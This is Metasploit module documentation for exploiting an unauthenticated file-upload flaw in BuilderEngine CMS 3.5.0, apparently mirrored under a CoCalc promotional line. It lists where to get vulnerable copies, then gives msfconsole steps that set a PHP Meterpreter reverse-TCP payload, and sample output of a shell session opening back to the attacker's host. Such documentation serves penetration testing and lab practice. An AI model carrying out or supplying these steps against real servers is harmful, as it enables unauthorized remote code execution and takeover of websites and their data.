CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

BuilderEngine is a Content Management System (CMS) that is Open Source, and includes blog, eCommerce, booking modules, etc. A vulnerability was found in the jQuery upload plugin, which could be abused upload a malicious file, which would result in arbitrary remote code execution under the context of the web server.

Vulnerable Application

According to public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.

A vulnerable copy was collected by Exploit-DB, which can be downloaded here:

https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip

Another way to test this exploit is by using the Sedna image:

https://www.vulnhub.com/entry/hackfest2016-sedna,181/#

Verification Steps

To see if the service is running BuilderEngine, you may use the check command from the module. If the resource is found, then you may see the following output:

msf exploit(builderengine_upload_exec) > check
[*] 192.168.1.123:80 The target appears to be vulnerable.

Knowing that the jquery-file-upload plugin is available, you can try the by following these steps:

1. In msfconsole, do exploit/multi/http/builderengine_upload_exec

2. set RHOST [Target IP]

3. set PAYLOAD php/meterpreter/reverse_tcp

4. set LHOST [Your IP]

5. exploit

If exploited successfully, you should see an output similar to the following:

msf exploit(builderengine_upload_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[+] Our payload is at: RnrXvNHDaQA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.123
[*] Meterpreter session 3 opened (192.168.1.1:4444 -> 192.168.1.123:51354) at 2017-05-16 14:44:14 -0500
[+] Deleted RnrXvNHDaQA.php

meterpreter >